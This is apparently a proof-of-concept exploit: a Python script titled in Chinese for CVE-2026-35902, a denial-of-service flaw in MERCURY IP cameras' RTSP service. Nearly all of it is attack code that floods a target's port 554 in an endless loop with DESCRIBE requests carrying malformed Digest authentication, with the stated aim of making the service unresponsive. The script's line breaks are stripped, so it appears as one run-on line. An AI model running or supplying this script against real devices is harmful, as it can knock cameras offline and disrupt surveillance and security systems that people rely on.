CVE-2026-35902 MERCURY IPCamera RTSP拒绝服务漏洞

import socket # Target configuration TARGET_IP = "192.168.1.100" TARGET_PORT = 554 def send_malicious_rtsp(): # Construct RTSP DESCRIBE request with invalid Digest Auth # This simulates an attacker sending bad credentials repeatedly payload = "DESCRIBE rtsp://{} RTSP/1.0\r\n".format(TARGET_IP) payload += "CSeq: 2\r\n" payload += "Authorization: Digest username=\"admin\", realm=\"IP Camera\", nonce=\"\", uri=\"\", response=\"invalid_hash_value\"\r\n" payload += "User-Agent: PoC-Client\r\n" payload += "\r\n" print("[+] Sending malicious RTSP packets to {}:{}...".format(TARGET_IP, TARGET_PORT)) try: while True: # Create socket to send packets s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((TARGET_IP, TARGET_PORT)) s.send(payload.encode('utf-8')) # Close connection immediately to simulate rapid attempts s.close() print("[+] Packet sent. RTSP service should be unresponsive soon.") except KeyboardInterrupt: print("[-] Exploit stopped by user.") except Exception as e: print("[-] Error: {}".format(e)) if __name__ == "__main__": send_malicious_rtsp()